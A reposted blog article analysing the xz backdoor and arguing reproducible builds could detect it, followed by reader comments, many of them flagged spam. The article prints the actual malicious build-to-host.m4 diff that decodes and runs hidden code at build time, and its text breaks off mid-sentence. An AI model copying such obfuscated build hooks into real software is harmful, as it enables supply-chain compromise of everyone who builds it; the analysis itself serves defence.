NixOS and reproducible builds could have detected the xz backdoor by birdculture

Share This Article

Sed ut perspiciatis unde.

In March 2024, a backdoor was discovered in xz, a (de)-compression software that is regularly used at the core of Linux distributions to unpack source tarballs of packaged software. The backdoor had been covertly inserted by a malicious maintainer under the pseudonym of Jia Tan over a period of three years. This event deeply stunned the open source community as the attack was both of massive impact (it allowed remote code execution on all affected machines that had ssh installed) and extremely difficult to detect. In fact, it was only thanks to the diligence (and maybe luck) of Andres Freund – a Postgres developer working at Microsoft – that the catastrophe was avoided: while investigating a seemingly unrelated 500ms performance regression in ssh that he was experiencing on several Debian unstable machines, he was able to trace it back to the liblzma library, identify the backdoor and document it.

While it was already established that the open source supply chain was often the target of malicious actors, what is stunning is the amount of energy invested by Jia Tan to gain the trust of the maintainer of the xz project, acquire push access to the repository and then among other perfectly legitimate contributions insert – piece by piece – the code for a very sophisticated and obfuscated backdoor. This should be a wake up call for the OSS community. We should consider the open source supply chain a high value target for powerful threat actors, and to collectively find countermeasures against such attacks.

In this article, I’ll discuss the inner workings of the xz backdoor and how I think we could have mechanically detected it thanks to build reproducibility.

The main intent of the backdoor is to allow for remote code execution on the target by hijacking the ssh program. To do that, it replaces the behavior of some of ssh’s functions (most importantly the RSA_public_decrypt one) in order to allow an attacker to execute arbitrary commands on a victim’s machine when some specific RSA key is used to log in. Two main pieces are combined to put together to install and activate the backdoor:

A script to de-obfuscate and install a malicious object file as part of the xz build process.
Interestingly the backdoor was not comprehensively contained in the source code for xz. Instead, the malicious components were only contained in tarballs built and signed by the malicious maintainer Jia Tan and published alongside releases 5.6.0 and 5.6.1 of xz. This time the additional release tarball contained slight and disguised modifications to extract a malicious object file from the .xz files used as data for some test contained in the repository.
A procedure to hook the RSA_public_decrypt function. The backdoor uses the ifunc mechanism of glibc to modify the address of the RSA_public_function when ssh is loaded, in case ssh links against liblzma through libsystemd.

Info

The rest of this section goes into the details of the two steps mentionned. Reading it is not necessary to understand the rest of the article. The most important takeaway here is that the backdoor was only active when using the maintainer-provided release tarball.

1. A script to de-obfuscate and install a malicious object file as part of the `xz` build process

As explained above, the malicious object file is stored directly in the xz git repository, hidden in some test files. The project being a decompression software, test cases include .xz files to be decompressed, making it possible to hide some machine code into fake test files;
The backdoor is not active in the code contained in the git repository, it is only included by building xz from the tarball released by the project, which has a few differences with the actual contents of the repository, most importantly in the m4/build-to-host.m4 file.

diff --git a/m4/build-to-host.m4 b/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],

   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '"'"${gl_final_[$1]}"'"'; then
     [$1]_c_make='"$([$1])"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed "rn" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval $gl_[$1]_config"])
 ])

 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\/\\/g'
   gl_sed_escape_doublequotes='s/"/\"/g'
+  gl_path_map='tr "t -_" " t_-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\([ "&'();<>\\`|]\),\\\1,g"
 changequote([,])dnl

While these changes may look benign to the naive eyes and well commented, they are actually hiding a chain of commands that decrypts/deobfuscates several fake .xz test files to ultimately produce two files:

a shell script that is run during the build of xz ;
a malicious binary object file.

There is an excellent analysis from Russ Cox that explains in detail how these two malicious resources are produced during the build process, and I advise any interested reader to find all relevant details there.

The shell script run during the build has two main purposes:

Verifying that the conditions to execute the backdoor are met on the builder (the backdoor targets specific Linux distributions, needs specific features of the glibc activated, needs ssh installed, etc) ;
Modifying the (legitimate) liblzma_la-crc64_fast.o to use the _get_cpuid symbol defined in the backdoor object file.

2. A procedure to hook the `RSA_public_decrypt` function

So how does a backdoor in the xz executable have any effect on ssh?
To understand that, we have to take a little detour in the realm of dynamic loaders and dynamically linked programs. Whenever a program depends on a library, there are two ways that library can be linked into the final executable:

statically, in that case the library is embedded into the final executable, hence increasing its size ;
dynamically, in which case it is the role of the dynamic loader (ld-linux.so in Linux) to find that shared library when the program starts and load it in memory.

When a program is compiled using dynamic linking, the addresses of the symbols belonging to dynamically linked libraries cannot be provided at compilation time: their position in memory is not know ahead of time! Instead, a reference to the Global Offset Table (or GOT) is inserted. When the program is started, the actual addresses are filled in the GOT by the dynamic linker.

The xz backdoor uses a functionality of the glibc called ifunc to force execution of code during dynamic loading time: ifunc is designed to allow selection between several implementations of the same function at dynamic loading time.

#include <stdio.h>

// Declaration of ifunc resolver function
int (*resolve_add(void))(int, int);

// First version of the add function
int add_v1(int a, int b) {
    printf("Using add_v1n");
    return a + b;
}

// Second version of the add function
int add_v2(int a, int b) {
    printf("Using add_v2n");
    return a + b;
}

// Resolver function that chooses the correct version of the function
int (*resolve_add(void))(int, int) {
    // You can implement any runtime check here.
    // In that case we check if the system is 64bit
    if (sizeof(void*) == 8) {
        return add_v2;
    } else {
        return add_v1;
    }
}

// Define the ifunc attribute for the add function
int add(int a, int b) __attribute__((ifunc("resolve_add")));

int main() {
    int result = add(10, 20);
    printf("Result: %dn", result);
    return 0;
}

In the above example, the ifunc attribute surrounding the add function indicates that the version that will be executed will be determined at dynamic loading time by running the resolve_add function. In that case, the resolve_add function returns add_v1 or add_v2 depending if the running system is a 64 bit system or not – and as such is completely harmless – but this technique is used by the xz backdoor to run some malicious code at dynamic loading time.

But dynamic loading of which program? Well, of ssh! In some Linux distributions (Debian and Fedora for example), ssh is patched to support systemd notifications and for this purpose, links with libsystemd, that in turn links with liblzma. In those distribution sshd hence has a transitive dependency on liblzma.

This is how the backdoor works: whenever sshd is executed, the dynamic loader loads libsystemd and then liblzma. With the backdoor installed, and leveraging the ifunc functionality as explained above, the backdoor is able to run arbitrary code when liblzma is being loaded. Indeed, as you remember from the previous section, the backdoor script modifies one of the legitimate xz object files: it actually modifies the resolver of one of the functions that uses ifunc to call its own malicious _get_cpuid symbol. When called, this function meddles with the GOT (that is not yet read-only at this time of execution) to modify the address of the RSA_public_decrypt function, replacing it by a malicious one! That’s it, at this point sshd uses the malicious RSA_public_decrypt function that gives RCE privileges to the attacker.

Once again, there exist more precise reports on exactly how the hooking happens that a curious reader might read, like this one for example. There is also a research article summarizing the attack vector and possible mitigations that I recommend reading.

What should our takeaways be from this near-miss and what should we do to minimize the risks of such an attack happening again in the future? Obviously, there is a lot to be said about the social issues at play here¹ and how we can build better resilience in the OSS ecosystem against malicious entities taking over really fundamental OSS projects, but in this piece I’ll only address the technical aspects of the question.

People are often convinced that OSS is more trustworthy than closed-source software because the code can be audited by practitioners and security professionals in order to detect vulnerabilities or backdoors. In this instance, this procedure has been made difficult by the fact that part of the code activating the backdoor was not included in the sources available within the git repository but was instead present in the maintainer-provided tarball. While this was used to hide the backdoor out of sight of most investigating eyes, this is also an opportunity for us to improve our software supply chain security processes.

Building software from trusted sources

One immediate observation that we can make in reaction to this supply chain incident is that it was only effective because a lot of distributions were using the maintainer provided tarball to build xz instead of the raw source code supplied by the git forge (in this case, GitHub). This reliance on release tarballs has plenty of historical and practical reasons:

the tarball workflow predates the existence of git and was used in the earliest Linux distributions;
tarballs are self-contained archives that encapsulate the exact state of the source code intended for release while git repositories can be altered, creating the need for a snapshot of the code;
tarballs can contain intermediary artifacts (for example manpages) used to lighten the build process, or configure scripts to target specific hardware, etc;
tarballs allow the source code to be compressed which is useful for space efficiency.

This being said, these reasons do not weigh enough in my opinion to justify the security risks they create. In all places where it is technically feasible, we should build software from sources authenticated by the most trustworthy party. For example, if a project is developed on GitHub, an a

0Likes

Written by

HackTech

View all posts by HackTech

Show comments (30)

30 Comments

Post Author

IshKebab

Posted March 22, 2025 at 9:09 pm

Yeah it certainly would have made hiding the backdoor more difficult. But far from impossible. You can always hide backdoors in source code if you want, it just takes more effort to make a plausible bug, and probably has a higher chance of detection.

0Likes Log in to Reply
Post Author

ltbarcly3

Posted March 22, 2025 at 9:11 pm

Yes, if you use a trusted framework then you are safe from things until that framework is attacked. The xz backdoor might have been detected, but the xz backdoor wasn't crafted with the goal of working against the Nix ecosystem. When a nix core developer ends up being a spy or whatever then there will end up being an attack against the nix ecosystem. Don't reply to this with some claim that Nix is inherently secure unless you want me to track you down and make you admit you were wrong when Nix ends up getting successfully exploited in a year or two.

0Likes Log in to Reply
Post Author

lolinder

Posted March 22, 2025 at 9:22 pm

Note that NixOS and reproducible builds did not detect the xz backdoor, and in fact NixOS shipped the malicious builds of xz (though they didn't do anything because the malware didn't target NixOS):

> I am a NixOS developer and I was surprised when the backdoor was revealed to see that the malicious version of xz had ended up being distributed to our users.

As always theory and reality are different, and the thing that made xz possible was never a technical vulnerability with a technical solution—xz was possible because of a meatspace exploit. We as a community are very very bad at recognizing that you can't always just patch meatspace with better software.

0Likes Log in to Reply
Post Author

lotharcable

Posted March 22, 2025 at 9:30 pm

So the argument hinges on the fact that the XZ maintainer hid malicious code in the tarballs that were not checked into Git.

The author demonstrates that Nix can be configured to generate the tarballs from git that go into building the binaries.

What I don't see, however, is how is this a feature that requires Nix or NixOS?

Any build system out there (including the stuff that goes into RPMs and Debs) can be configured to generate tarballs as a intermediate step.

In fact making reproducible builds is a major thing that Debian has been working on for some time now.

https://wiki.debian.org/ReproducibleBuilds

0Likes Log in to Reply
Post Author

rowanG077

Posted March 22, 2025 at 10:01 pm

it's somehow immensely funny to me that some state probably had an entire project to land this backdoor in xz, spend literal years to make it happen. And then it was immediately detected and all effort was for nothing.

0Likes Log in to Reply
Post Author

datadeft

Posted March 22, 2025 at 10:11 pm

could have / should have => being smart retrospectively

0Likes Log in to Reply
Post Author

mcint

Posted March 22, 2025 at 10:20 pm

Excellent descriptive analysis. Wrong, misleading title, perhaps "technically correct," but at best with a "backdoored" meaning.

It points out the need and use for build-manager tools that go a step beyond union file system layers, but track then enforce that e.g. tests cannot pollute build artifacts. Take a causal trace graph of files affecting files, in the build process, make that trace graph explicit, and then build a way to enforce that graph, or report on deviations from previous trace graphs.

0Likes Log in to Reply
Post Author

nialv7

Posted March 22, 2025 at 10:25 pm

I feel the author is a bit tunnel visioned by what happens to happen this time. The Jiatan incident has a sample size of one, it'd be a bit short sighted to think that's the only way it could happen. You can imagine various scenarios where the defenses suggested here will not have worked.

Also I (as a nix user myself) think it's unlikely NixOS would have caught it. As evidenced by the fact that it didn't. (Yeah I realize I just said next time it might happen differently but it'd be foolish to put faith in nix without evidence).

0Likes Log in to Reply
Post Author

MortyWaves

Posted March 22, 2025 at 11:26 pm

I don't like how this site causes my headphones to crackle…

0Likes Log in to Reply
Post Author

donnachangstein

Posted March 22, 2025 at 11:52 pm

NixOS is really irrelevant here because the xz backdoor specifically targeted RedHat and Debian. It's equally relevant to say the xz backdoor didn't affect Windows (ironically the backdoor was ultimately found by a Microsoft employee, an oft-overlooked detail).

0Likes Log in to Reply
Post Author

massysett

Posted March 23, 2025 at 12:10 am

Article says that distributions should get source code directly from the VCS (for instance Github) rather than the traditional installation tarball.

I don’t see what this solves though. Couldn’t a malicious maintainer simply add binary blobs directly to the source code repository?

The author suggests Github is trusted, as though Github validates code in some way. Which of course it does not.

0Likes Log in to Reply
Post Author

a-dub

Posted March 23, 2025 at 12:15 am

llm commit scanning might be an interesting approach to the oss supply chain security problem.

0Likes Log in to Reply
Post Author

sirspamalot101

Posted March 23, 2025 at 12:28 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot102

Posted March 23, 2025 at 12:29 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot103

Posted March 23, 2025 at 12:30 am

[dead]

0Likes Log in to Reply
Post Author

sirspamalot104

Posted March 23, 2025 at 12:31 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot105

Posted March 23, 2025 at 12:31 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot106

Posted March 23, 2025 at 12:32 am

[dead]

0Likes Log in to Reply
Post Author

sirspamalot107

Posted March 23, 2025 at 12:34 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot108

Posted March 23, 2025 at 12:34 am

[flagged]

0Likes Log in to Reply
Post Author

sirspamalot110

Posted March 23, 2025 at 12:36 am

[dead]

0Likes Log in to Reply
Post Author

sirspamalot111

Posted March 23, 2025 at 12:36 am

[flagged]

0Likes Log in to Reply
Post Author

__MatrixMan__

Posted March 23, 2025 at 12:38 am

If we want to focus on a thing that NixOS could have prevented, we should focus on the CrowdStrike incident. Being able to boot to yesterday's config because today's config isn't working would've mitigated most of the problems.

0Likes Log in to Reply
Post Author

sirspamalot112

Posted March 23, 2025 at 12:38 am

[dead]

0Likes Log in to Reply
Post Author

sirspamalot113

Posted March 23, 2025 at 12:39 am

[flagged]

0Likes Log in to Reply
Post Author

dataflow

Posted March 23, 2025 at 12:45 am

Why is nobody questioning this:

> To build xz from sources, we need autoconf to generate the configure script. But autoconf has a dependency on xz!

Both directions of this seem crazy to me.

1. Why the heck should a build configuration tool like autoconf be unable to function without a compression tool like xz? That makes no sense on its face.

2. For that matter, why the heck should xz, a tool that is supposedly so fundamental, have a hard dependency on a boilerplate generator like autoconf?

At the end of the day all autoconf is doing is telling you how to invoke your compiler. You ought to have a way to do that without the tool, even if it produces a suboptimal binary. If you care about security, instead of taking a giant tarball you don't understand and the running another tool in it, shouldn't you just generate that command line somehow (even in an untrusted fashion), review it, and then use that human-verified script to bootstrap?

And if you need a (de)compressor that low on the dependency tree so that literally the entire world might one day rest on it, surely you can isolate the actual computation for bootstrapping purposes and just expose it with just the open/read/write/close syscalls as dependencies? Why do you need all the bells and whistles?

0Likes Log in to Reply
Post Author

banana_dick_1

Posted March 23, 2025 at 12:53 am

[flagged]

0Likes Log in to Reply
Post Author

banana_dick_10

Posted March 23, 2025 at 1:00 am

[dead]

0Likes Log in to Reply
Post Author

banana_dick_14

Posted March 23, 2025 at 1:04 am

[dead]

0Likes Log in to Reply
Post Author

wwarner

Posted March 23, 2025 at 2:16 am

Learned a lot reading this article!

0Likes Log in to Reply

NixOS and reproducible builds could have detected the xz backdoor by birdculture

NixOS and reproducible builds could have detected the xz backdoor by birdculture

Share This Article

Newsletter

1. A script to de-obfuscate and install a malicious object file as part of the xz build process

2. A procedure to hook the RSA_public_decrypt function

Building software from trusted sources

30 Comments

Leave a comment Cancel reply

Editor's Choice

Sign Up to Our Newsletter

1. A script to de-obfuscate and install a malicious object file as part of the `xz` build process

2. A procedure to hook the `RSA_public_decrypt` function